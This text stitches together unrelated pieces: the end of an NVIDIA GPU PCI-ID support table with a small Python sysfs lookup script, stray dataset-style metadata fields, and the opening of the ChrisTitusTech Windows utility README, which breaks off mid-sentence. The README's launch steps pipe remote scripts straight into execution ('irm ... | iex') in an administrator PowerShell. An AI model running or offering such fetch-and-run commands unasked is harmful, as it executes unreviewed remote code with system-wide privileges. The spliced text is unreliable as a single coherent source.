1F50 1028 08ED | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F50 1028 08EE | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F50 1028 08EF | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F50 103C 8572 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F50 103C 8573 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F50 103C 8574 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F50 103C 8600 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F50 103C 8605 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F50 17AA 3FEE | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F50 17AA 3FFE | | NVIDIA GeForce RTX 2060 | 1F51 | | NVIDIA GeForce RTX 2070 | 1F54 | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F54 103C 878A | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F54 17AA 3FCE | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F54 17AA 3FCF | | NVIDIA GeForce RTX 2070 with Max-Q Design | 1F54 17AA 3FD0 | | NVIDIA GeForce RTX 2060 | 1F55 | | Quadro RTX 3000 | 1F76 | | Matrox D-Series D2450 | 1F76 102B 2800 | | Matrox D-Series D2480 | 1F76 102B 2900 | | NVIDIA GeForce GTX 1650 | 1F82 | | NVIDIA GeForce GTX 1630 | 1F83 | | NVIDIA GeForce GTX 1650 | 1F91 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 103C 863E | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 103C 86E7 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 103C 86E8 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 1043 12CF | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 1043 156F | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 1414 0032 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 144D C822 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 1462 127E | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 1462 1281 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 1462 1284 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 1462 1285 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 1462 129C | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 17AA 229F | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 17AA 3802 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 17AA 3806 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 17AA 3F1A | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F91 1A58 1001 | | NVIDIA GeForce GTX 1650 Ti | 1F95 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 1025 1479 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 1025 147A | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 1025 147B | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 1025 147C | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 103C 86E7 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 103C 86E8 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 103C 8815 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 1043 1DFF | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 1043 1E1F | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 144D C838 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 1462 12BD | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 1462 12C5 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 1462 12D2 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 17AA 22C0 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 17AA 22C1 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 17AA 3837 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 17AA 3F95 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 1A58 1003 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 1A58 1006 | | NVIDIA GeForce GTX 1650 Ti 
with Max-Q Design | 1F95 1A58 1007 | | NVIDIA GeForce GTX 1650 Ti with Max-Q Design | 1F95 1E83 3E30 | | NVIDIA GeForce GTX 1650 | 1F96 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F96 1462 1297 | | NVIDIA GeForce MX450 | 1F97 | | NVIDIA GeForce MX450 | 1F98 | | NVIDIA GeForce GTX 1650 | 1F99 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 1025 1479 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 1025 147A | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 1025 147B | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 1025 147C | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 103C 8815 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 1043 13B2 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 1043 1402 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 1043 1902 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 1462 12BD | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 1462 12C5 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 1462 12D2 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 17AA 22DA | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 17AA 3F93 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F99 1E83 3E30 | | NVIDIA GeForce MX450 | 1F9C | | NVIDIA GeForce GTX 1650 | 1F9D | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F9D 1043 128D | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F9D 1043 130D | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F9D 1043 149C | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F9D 1043 185C | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F9D 1043 189C | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F9D 1462 12F4 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F9D 1462 1302 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F9D 1462 131B | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F9D 1462 1326 | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F9D 1462 132A | | NVIDIA GeForce GTX 1650 with Max-Q Design | 1F9D 1462 132E | | NVIDIA GeForce MX550 | 1F9F | | NVIDIA GeForce MX550 | 1FA0 | | NVIDIA T1000 | 1FB0 1028 12DB | | NVIDIA T1000 | 1FB0 103C 12DB | | NVIDIA T1000 | 1FB0 103C 8A80 | | NVIDIA T1000 | 1FB0 10DE 12DB | | NVIDIA DGX Display | 1FB0 10DE 1485 | | NVIDIA T1000 | 1FB0 17AA 12DB | | NVIDIA T600 | 1FB1 1028 1488 | | NVIDIA T600 | 1FB1 103C 1488 | | NVIDIA T600 | 1FB1 103C 8A80 | | NVIDIA T600 | 1FB1 10DE 1488 | | NVIDIA T600 | 1FB1 17AA 1488 | | NVIDIA T400 | 1FB2 1028 1489 | | NVIDIA T400 | 1FB2 103C 1489 | | NVIDIA T400 | 1FB2 103C 8A80 | | NVIDIA T400 | 1FB2 10DE 1489 | | NVIDIA T400 | 1FB2 17AA 1489 | | NVIDIA T600 Laptop GPU | 1FB6 | | NVIDIA T550 Laptop GPU | 1FB7 | | Quadro T2000 | 1FB8 | | Quadro T2000 with Max-Q Design | 1FB8 1028 097E | | Quadro T2000 with Max-Q Design | 1FB8 103C 8736 | | Quadro T2000 with Max-Q Design | 1FB8 103C 8738 | | Quadro T2000 with Max-Q Design | 1FB8 103C 8772 | | Quadro T2000 with Max-Q Design | 1FB8 103C 8780 | | Quadro T2000 with Max-Q Design | 1FB8 103C 8782 | | Quadro T2000 with Max-Q Design | 1FB8 103C 8783 | | Quadro T2000 with Max-Q Design | 1FB8 103C 8785 | | Quadro T2000 with Max-Q Design | 1FB8 103C 87F0 | | Quadro T2000 with Max-Q Design | 1FB8 1462 1281 | | Quadro T2000 with Max-Q Design | 1FB8 1462 12BD | | Quadro T2000 with Max-Q Design | 1FB8 17AA 22C0 | | Quadro T2000 with Max-Q Design | 1FB8 17AA 22C1 | | Quadro T1000 | 1FB9 | | Quadro T1000 with Max-Q Design | 1FB9 1025 1479 | | Quadro T1000 with Max-Q Design | 1FB9 1025 147A | | Quadro T1000 with Max-Q Design | 1FB9 1025 147B | | Quadro T1000 with Max-Q Design | 1FB9 1025 147C | | Quadro 
T1000 with Max-Q Design | 1FB9 103C 8736 | | Quadro T1000 with Max-Q Design | 1FB9 103C 8738 | | Quadro T1000 with Max-Q Design | 1FB9 103C 8772 | | Quadro T1000 with Max-Q Design | 1FB9 103C 8780 | | Quadro T1000 with Max-Q Design | 1FB9 103C 8782 | | Quadro T1000 with Max-Q Design | 1FB9 103C 8783 | | Quadro T1000 with Max-Q Design | 1FB9 103C 8785 | | Quadro T1000 with Max-Q Design | 1FB9 103C 87F0 | | Quadro T1000 with Max-Q Design | 1FB9 1462 12BD | | Quadro T1000 with Max-Q Design | 1FB9 17AA 22C0 | | Quadro T1000 with Max-Q Design | 1FB9 17AA 22C1 | | NVIDIA T600 Laptop GPU | 1FBA | | NVIDIA T500 | 1FBB | | NVIDIA T1200 Laptop GPU | 1FBC | | NVIDIA GeForce GTX 1650 | 1FDD | | NVIDIA T1000 8GB | 1FF0 1028 1612 | | NVIDIA T1000 8GB | 1FF0 103C 1612 | | NVIDIA T1000 8GB | 1FF0 103C 8A80 | | NVIDIA T1000 8GB | 1FF0 10DE 1612 | | NVIDIA T1000 8GB | 1FF0 17AA 1612 | | NVIDIA T400 4GB | 1FF2 1028 1613 | | NVIDIA T400 4GB | 1FF2 103C 1613 | | NVIDIA T400E | 1FF2 103C 18FF | | NVIDIA T400 4GB | 1FF2 103C 8A80 | | NVIDIA T400 4GB | 1FF2 10DE 1613 | | NVIDIA T400E | 1FF2 10DE 18FF | | NVIDIA T400 4GB | 1FF2 17AA 1613 | | NVIDIA T400E | 1FF2 17AA 18FF | | Quadro T1000 | 1FF9 | | NVIDIA A100-SXM4-40GB | 20B0 | | NVIDIA A100-PG509-200 | 20B0 10DE 1450 | | NVIDIA A100-SXM4-80GB | 20B2 10DE 1463 | | NVIDIA A100-SXM4-80GB | 20B2 10DE 147F | | NVIDIA A100-SXM4-80GB | 20B2 10DE 1622 | | NVIDIA A100-SXM4-80GB | 20B2 10DE 1623 | | NVIDIA PG509-210 | 20B2 10DE 1625 | | NVIDIA A100-SXM-64GB | 20B3 10DE 14A7 | | NVIDIA A100-SXM-64GB | 20B3 10DE 14A8 | | NVIDIA A100 80GB PCIe | 20B5 10DE 1533 | | NVIDIA A100 80GB PCIe | 20B5 10DE 1642 | | NVIDIA PG506-232 | 20B6 10DE 1492 | | NVIDIA A30 | 20B7 10DE 1532 | | NVIDIA A30 | 20B7 10DE 1804 | | NVIDIA A30 | 20B7 10DE 1852 | | NVIDIA A800-SXM4-40GB | 20BD 10DE 17F4 | | NVIDIA A100-PCIE-40GB | 20F1 10DE 145F | | NVIDIA A800-SXM4-80GB | 20F3 10DE 179B | | NVIDIA A800-SXM4-80GB | 20F3 10DE 179C | | NVIDIA A800-SXM4-80GB | 20F3 10DE 179D | | NVIDIA A800-SXM4-80GB | 20F3 10DE 179E | | NVIDIA A800-SXM4-80GB | 20F3 10DE 179F | | NVIDIA A800-SXM4-80GB | 20F3 10DE 17A0 | | NVIDIA A800-SXM4-80GB | 20F3 10DE 17A1 | | NVIDIA A800-SXM4-80GB | 20F3 10DE 17A2 | | NVIDIA A800 80GB PCIe | 20F5 10DE 1799 | | NVIDIA A800 80GB PCIe LC | 20F5 10DE 179A | | NVIDIA A800 40GB Active | 20F6 1028 180A | | NVIDIA A800 40GB Active | 20F6 103C 180A | | NVIDIA A800 40GB Active | 20F6 10DE 180A | | NVIDIA A800 40GB Active | 20F6 17AA 180A | | NVIDIA AX800 | 20FD 10DE 17F8 | | NVIDIA GeForce GTX 1660 Ti | 2182 | | NVIDIA GeForce GTX 1660 | 2184 | | NVIDIA GeForce GTX 1650 SUPER | 2187 | | NVIDIA GeForce GTX 1650 | 2188 | | NVIDIA GeForce GTX 1660 Ti | 2191 | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 1028 0949 | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 103C 85FB | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 103C 85FE | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 103C 86D6 | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 103C 8741 | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 103C 8744 | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 103C 878D | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 103C 87AF | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 103C 87B3 | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 1043 171F | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 1043 17EF | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 1043 18D1 | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 1414 
0032 | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 1462 128A | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 1462 128B | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 1462 12C6 | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 1462 12CB | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 1462 12CC | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 1462 12D9 | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 17AA 380C | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 17AA 381D | | NVIDIA GeForce GTX 1660 Ti with Max-Q Design | 2191 17AA 381E | | NVIDIA GeForce GTX 1650 Ti | 2192 | | NVIDIA GeForce GTX 1660 SUPER | 21C4 | | NVIDIA GeForce GTX 1660 Ti | 21D1 | | NVIDIA GeForce RTX 3090 Ti | 2203 | | NVIDIA GeForce RTX 3090 | 2204 | | NVIDIA GeForce RTX 3080 | 2206 | | NVIDIA GeForce RTX 3070 Ti | 2207 | | NVIDIA GeForce RTX 3080 Ti | 2208 | | NVIDIA GeForce RTX 3080 | 220A | | NVIDIA CMP 90HX | 220D | | NVIDIA GeForce RTX 3080 | 2216 | | NVIDIA RTX A6000 | 2230 1028 1459 | | NVIDIA RTX A6000 | 2230 103C 1459 | | NVIDIA RTX A6000 | 2230 10DE 1459 | | NVIDIA RTX A6000 | 2230 17AA 1459 | | NVIDIA RTX A5000 | 2231 1028 147E | | NVIDIA RTX A5000 | 2231 103C 147E | | NVIDIA RTX A5000 | 2231 10DE 147E | | NVIDIA RTX A5000 | 2231 17AA 147E | | NVIDIA RTX A4500 | 2232 1028 163C | | NVIDIA RTX A4500 | 2232 103C 163C | | NVIDIA RTX A4500 | 2232 10DE 163C | | NVIDIA RTX A4500 | 2232 17AA 163C | | NVIDIA RTX A5500 | 2233 1028 165A | | NVIDIA RTX A5500 | 2233 103C 165A | | NVIDIA RTX A5500 | 2233 10DE 165A | | NVIDIA RTX A5500 | 2233 17AA 165A | | NVIDIA A40 | 2235 10DE 145A | | NVIDIA A10 | 2236 10DE 1482 | | NVIDIA A10G | 2237 10DE 152F | | NVIDIA A10M | 2238 10DE 1677 | | NVIDIA H100 NVL | 2321 10DE 1839 | | NVIDIA H800 PCIe | 2322 10DE 17A4 | | NVIDIA H800 | 2324 10DE 17A6 | | NVIDIA H800 | 2324 10DE 17A8 | | NVIDIA H20 | 2329 10DE 198B | | NVIDIA H20 | 2329 10DE 198C | | NVIDIA H100 80GB HBM3 | 2330 10DE 16C0 | | NVIDIA H100 80GB HBM3 | 2330 10DE 16C1 | | NVIDIA H100 PCIe | 2331 10DE 1626 | | NVIDIA H200 | 2335 10DE 18BE | | NVIDIA H200 | 2335 10DE 18BF | | NVIDIA H100 | 2339 10DE 17FC | | NVIDIA H800 NVL | 233A 10DE 183A | | NVIDIA GH200 120GB | 2342 10DE 16EB | | NVIDIA GH200 120GB | 2342 10DE 1805 | | NVIDIA GH200 480GB | 2342 10DE 1809 | | NVIDIA GeForce RTX 3060 Ti | 2414 | | NVIDIA GeForce RTX 3080 Ti Laptop GPU | 2420 | | NVIDIA RTX A5500 Laptop GPU | 2438 | | NVIDIA GeForce RTX 3080 Ti Laptop GPU | 2460 | | NVIDIA GeForce RTX 3070 Ti | 2482 | | NVIDIA GeForce RTX 3070 | 2484 | | NVIDIA GeForce RTX 3060 Ti | 2486 | | NVIDIA GeForce RTX 3060 | 2487 | | NVIDIA GeForce RTX 3070 | 2488 | | NVIDIA GeForce RTX 3060 Ti | 2489 | | NVIDIA CMP 70HX | 248A | | NVIDIA GeForce RTX 3080 Laptop GPU | 249C | | NVIDIA GeForce RTX 3060 Laptop GPU | 249C 1D05 1194 | | NVIDIA GeForce RTX 3070 Laptop GPU | 249D | | NVIDIA GeForce RTX 3070 Ti Laptop GPU | 24A0 | | NVIDIA GeForce RTX 3060 Laptop GPU | 24A0 1D05 1192 | | NVIDIA RTX A4000 | 24B0 1028 14AD | | NVIDIA RTX A4000 | 24B0 103C 14AD | | NVIDIA RTX A4000 | 24B0 10DE 14AD | | NVIDIA RTX A4000 | 24B0 17AA 14AD | | NVIDIA RTX A4000H | 24B1 10DE 1658 | | NVIDIA RTX A5000 Laptop GPU | 24B6 | | NVIDIA RTX A4000 Laptop GPU | 24B7 | | NVIDIA RTX A3000 Laptop GPU | 24B8 | | NVIDIA RTX A3000 12GB Laptop GPU | 24B9 | | NVIDIA RTX A4500 Laptop GPU | 24BA | | NVIDIA RTX A3000 12GB Laptop GPU | 24BB | | NVIDIA GeForce RTX 3060 | 24C7 | | NVIDIA GeForce RTX 3060 Ti | 24C9 | | NVIDIA GeForce RTX 3080 Laptop GPU | 24DC | | 
NVIDIA GeForce RTX 3070 Laptop GPU | 24DD | | NVIDIA GeForce RTX 3070 Ti Laptop GPU | 24E0 | | NVIDIA RTX A4500 Embedded GPU | 24FA | | NVIDIA GeForce RTX 3060 | 2503 | | NVIDIA GeForce RTX 3060 | 2504 | | NVIDIA GeForce RTX 3050 | 2507 | | NVIDIA GeForce RTX 3050 OEM | 2508 | | NVIDIA GeForce RTX 3060 Laptop GPU | 2520 | | NVIDIA GeForce RTX 3060 Laptop GPU | 2521 | | NVIDIA GeForce RTX 3050 Ti Laptop GPU | 2523 | | NVIDIA RTX A2000 | 2531 1028 151D | | NVIDIA RTX A2000 | 2531 103C 151D | | NVIDIA RTX A2000 | 2531 10DE 151D | | NVIDIA RTX A2000 | 2531 17AA 151D | | NVIDIA GeForce RTX 3060 | 2544 | | NVIDIA GeForce RTX 3060 Laptop GPU | 2560 | | NVIDIA GeForce RTX 3050 Ti Laptop GPU | 2563 | | NVIDIA RTX A2000 12GB | 2571 1028 1611 | | NVIDIA RTX A2000 12GB | 2571 103C 1611 | | NVIDIA RTX A2000 12GB | 2571 10DE 1611 | | NVIDIA RTX A2000 12GB | 2571 17AA 1611 | | NVIDIA GeForce RTX 3050 | 2582 | | NVIDIA GeForce RTX 3050 | 2584 | | NVIDIA GeForce RTX 3050 Ti Laptop GPU | 25A0 | | NVIDIA GeForce RTX 3050Ti Laptop GPU | 25A0 103C 8928 | | NVIDIA GeForce RTX 3050Ti Laptop GPU | 25A0 103C 89F9 | | NVIDIA GeForce RTX 3060 Laptop GPU | 25A0 1D05 1196 | | NVIDIA GeForce RTX 3050 Laptop GPU | 25A2 | | NVIDIA GeForce RTX 3050 Ti Laptop GPU | 25A2 1028 0BAF | | NVIDIA GeForce RTX 3060 Laptop GPU | 25A2 1D05 1195 | | NVIDIA GeForce RTX 3050 Laptop GPU | 25A5 | | NVIDIA GeForce MX570 | 25A6 | | NVIDIA GeForce RTX 2050 | 25A7 | | NVIDIA GeForce RTX 2050 | 25A9 | | NVIDIA GeForce MX570 A | 25AA | | NVIDIA GeForce RTX 3050 4GB Laptop GPU | 25AB | | NVIDIA GeForce RTX 3050 6GB Laptop GPU | 25AC | | NVIDIA GeForce RTX 2050 | 25AD | | NVIDIA RTX A1000 | 25B0 1028 1878 | | NVIDIA RTX A1000 | 25B0 103C 1878 | | NVIDIA RTX A1000 | 25B0 10DE 1878 | | NVIDIA RTX A1000 | 25B0 17AA 1878 | | NVIDIA RTX A400 | 25B2 1028 1879 | | NVIDIA RTX A400 | 25B2 103C 1879 | | NVIDIA RTX A400 | 25B2 10DE 1879 | | NVIDIA RTX A400 | 25B2 17AA 1879 | | NVIDIA A16 | 25B6 10DE 14A9 | | NVIDIA A2 | 25B6 10DE 157E | | NVIDIA RTX A2000 Laptop GPU | 25B8 | | NVIDIA RTX A1000 Laptop GPU | 25B9 | | NVIDIA RTX A2000 8GB Laptop GPU | 25BA | | NVIDIA RTX A500 Laptop GPU | 25BB | | NVIDIA RTX A1000 6GB Laptop GPU | 25BC | | NVIDIA RTX A500 Laptop GPU | 25BD | | NVIDIA GeForce RTX 3050 Ti Laptop GPU | 25E0 | | NVIDIA GeForce RTX 3050 Laptop GPU | 25E2 | | NVIDIA GeForce RTX 3050 Laptop GPU | 25E5 | | NVIDIA GeForce RTX 3050 6GB Laptop GPU | 25EC | | NVIDIA GeForce RTX 2050 | 25ED | | NVIDIA RTX A1000 Embedded GPU | 25F9 | | NVIDIA RTX A2000 Embedded GPU | 25FA | | NVIDIA RTX A500 Embedded GPU | 25FB | | NVIDIA GeForce RTX 4090 | 2684 | | NVIDIA GeForce RTX 4090 D | 2685 | | NVIDIA RTX 6000 Ada Generation | 26B1 1028 16A1 | | NVIDIA RTX 6000 Ada Generation | 26B1 103C 16A1 | | NVIDIA RTX 6000 Ada Generation | 26B1 10DE 16A1 | | NVIDIA RTX 6000 Ada Generation | 26B1 17AA 16A1 | | NVIDIA RTX 5000 Ada Generation | 26B2 1028 17FA | | NVIDIA RTX 5000 Ada Generation | 26B2 103C 17FA | | NVIDIA RTX 5000 Ada Generation | 26B2 10DE 17FA | | NVIDIA RTX 5000 Ada Generation | 26B2 17AA 17FA | | NVIDIA RTX 5880 Ada Generation | 26B3 1028 1934 | | NVIDIA RTX 5880 Ada Generation | 26B3 103C 1934 | | NVIDIA RTX 5880 Ada Generation | 26B3 10DE 1934 | | NVIDIA RTX 5880 Ada Generation | 26B3 17AA 1934 | | NVIDIA L40 | 26B5 10DE 169D | | NVIDIA L40 | 26B5 10DE 17DA | | NVIDIA L40S | 26B9 10DE 1851 | | NVIDIA L40S | 26B9 10DE 18CF | | NVIDIA L20 | 26BA 10DE 1957 | | NVIDIA L20 | 26BA 10DE 1990 | | NVIDIA GeForce RTX 4080 SUPER | 2702 | | NVIDIA GeForce RTX 4080 | 
2704 | | NVIDIA GeForce RTX 4070 Ti SUPER | 2705 | | NVIDIA GeForce RTX 4070 | 2709 | | NVIDIA GeForce RTX 4090 Laptop GPU | 2717 | | NVIDIA RTX 5000 Ada Generation Laptop GPU | 2730 | | NVIDIA GeForce RTX 4090 Laptop GPU | 2757 | | NVIDIA RTX 5000 Ada Generation Embedded GPU | 2770 | | NVIDIA GeForce RTX 4070 Ti | 2782 | | NVIDIA GeForce RTX 4070 SUPER | 2783 | | NVIDIA GeForce RTX 4070 | 2786 | | NVIDIA GeForce RTX 4060 Ti | 2788 | | NVIDIA GeForce RTX 4080 Laptop GPU | 27A0 | | NVIDIA RTX 4000 SFF Ada Generation | 27B0 1028 16FA | | NVIDIA RTX 4000 SFF Ada Generation | 27B0 103C 16FA | | NVIDIA RTX 4000 SFF Ada Generation | 27B0 10DE 16FA | | NVIDIA RTX 4000 SFF Ada Generation | 27B0 17AA 16FA | | NVIDIA RTX 4500 Ada Generation | 27B1 1028 180C | | NVIDIA RTX 4500 Ada Generation | 27B1 103C 180C | | NVIDIA RTX 4500 Ada Generation | 27B1 10DE 180C | | NVIDIA RTX 4500 Ada Generation | 27B1 17AA 180C | | NVIDIA RTX 4000 Ada Generation | 27B2 1028 181B | | NVIDIA RTX 4000 Ada Generation | 27B2 103C 181B | | NVIDIA RTX 4000 Ada Generation | 27B2 10DE 181B | | NVIDIA RTX 4000 Ada Generation | 27B2 17AA 181B | | NVIDIA L2 | 27B6 10DE 1933 | | NVIDIA L4 | 27B8 10DE 16CA | | NVIDIA L4 | 27B8 10DE 16EE | | NVIDIA RTX 4000 Ada Generation Laptop GPU | 27BA | | NVIDIA RTX 3500 Ada Generation Laptop GPU | 27BB | | NVIDIA GeForce RTX 4080 Laptop GPU | 27E0 | | NVIDIA RTX 3500 Ada Generation Embedded GPU | 27FB | | NVIDIA GeForce RTX 4060 Ti | 2803 | | NVIDIA GeForce RTX 4060 Ti | 2805 | | NVIDIA GeForce RTX 4060 | 2808 | | NVIDIA GeForce RTX 4070 Laptop GPU | 2820 | | NVIDIA RTX 3000 Ada Generation Laptop GPU | 2838 | | NVIDIA GeForce RTX 4070 Laptop GPU | 2860 | | NVIDIA GeForce RTX 4060 | 2882 | | NVIDIA GeForce RTX 4060 Laptop GPU | 28A0 | | NVIDIA GeForce RTX 4050 Laptop GPU | 28A1 | | NVIDIA RTX 2000 Ada Generation | 28B0 1028 1870 | | NVIDIA RTX 2000 Ada Generation | 28B0 103C 1870 | | NVIDIA RTX 2000E Ada Generation | 28B0 103C 1871 | | NVIDIA RTX 2000 Ada Generation | 28B0 10DE 1870 | | NVIDIA RTX 2000E Ada Generation | 28B0 10DE 1871 | | NVIDIA RTX 2000 Ada Generation | 28B0 17AA 1870 | | NVIDIA RTX 2000E Ada Generation | 28B0 17AA 1871 | | NVIDIA RTX 2000 Ada Generation Laptop GPU | 28B8 | | NVIDIA RTX 1000 Ada Generation Laptop GPU | 28B9 | | NVIDIA RTX 500 Ada Generation Laptop GPU | 28BA | | NVIDIA RTX 500 Ada Generation Laptop GPU | 28BB | | NVIDIA GeForce RTX 4060 Laptop GPU | 28E0 | | NVIDIA GeForce RTX 4050 Laptop GPU | 28E1 | | NVIDIA RTX 2000 Ada Generation Embedded GPU | 28F8 |
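To check a local GPU against the supported-device table above, the PCI device and subsystem IDs can be read from sysfs on Linux. The sketch below is a minimal, standard-library-only example; the sysfs attribute paths are standard, but the printed entries may include non-display NVIDIA functions (audio, USB controllers) that do not appear in the table.

```python
# Minimal sketch: print the PCI IDs of NVIDIA devices so they can be matched
# against the supported-device table (device ID, subsystem vendor, subsystem device).
from pathlib import Path

NVIDIA_VENDOR = "0x10de"

for dev in sorted(Path("/sys/bus/pci/devices").iterdir()):
    if (dev / "vendor").read_text().strip() != NVIDIA_VENDOR:
        continue
    device = (dev / "device").read_text().strip()
    sub_vendor = (dev / "subsystem_vendor").read_text().strip()
    sub_device = (dev / "subsystem_device").read_text().strip()
    # Table entries are uppercase hex without the 0x prefix, e.g. "2684"
    # or "2230 10DE 1459" when a subsystem-specific entry exists.
    print(dev.name, device[2:].upper(), sub_vendor[2:].upper(), sub_device[2:].upper())
```

Single-ID rows in the table match on the device ID alone; three-part rows additionally constrain the subsystem vendor and subsystem device IDs.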
NVIDIA Linux open GPU kernel module source
null
96
30
144
59
126
15
0
ChrisTitusTech/winutil
# Chris Titus Tech's Windows Utility This utility is a compilation of Windows tasks I perform on each Windows system I use. It is meant to streamline *installs*, debloat with *tweaks*, troubleshoot with *config*, and fix Windows *updates*. I am extremely picky about any contributions to keep this project clean and efficient. ![screen-install](screen-install.png) ## Usage Winutil must be run in Admin mode because it performs system-wide tweaks. To achieve this, open PowerShell or Windows Terminal as an administrator. Here are a few ways to do it: 1. **Right-Click Method:** - Right-click on the start menu. - Choose "Windows PowerShell (Admin)" (for Windows 10) or "Terminal (Admin)" (for Windows 11). 2. **Search and Launch Method:** - Press the Windows key. - Type "PowerShell" or "Terminal" (for Windows 11). - Press `Ctrl + Shift + Enter` to launch it with administrator privileges. ### Launch Command #### Simple way ``` irm https://christitus.com/win | iex ``` Courtesy of the issue raised at: [#144](/../../issues/144) or by executing: ``` iwr -useb https://christitus.com/win | iex ``` If for some reason this site is not reachable from your country, please try running it directly from GitHub (replace `RELEASE_TAG` with the release you are interested in, for example `v2024.06.05`): ``` irm "https://github.com/ChrisTitusTech/winutil/releases/download/RELEASE_TAG/winutil.ps1" | iex ``` #### Automation Some features are available through automation. This allows you to save your config file, pass it to Winutil, walk away, and come back to a finished system. Here is how you can set it up currently with Winutil >24.01.15: 1. On the Install Tab, click "Get Installed"; this will get all installed apps **supported by Winutil** on the system ![GetInstalled](/wiki/Get-Installed.png) 2. Click on the Settings cog in the upper right corner, choose Export, and choose a file name and location; this will export the settings file. ![SettingsExport](/wiki/Settings-Export.png) 3. Copy this file to a USB drive or somewhere you can use it after Windows installation. 4. Use the Microwin tab to create a custom Windows image. 5. Install the Windows image. 6. In the new Windows install, open PowerShell in admin mode and run the following command to automatically apply tweaks and install apps from the config file (a concrete example appears at the end of this README). ``` iex "& { $(irm christitus.com/win) } -Config [path-to-your-config] -Run" ``` 7. Have a cup of coffee! Come back 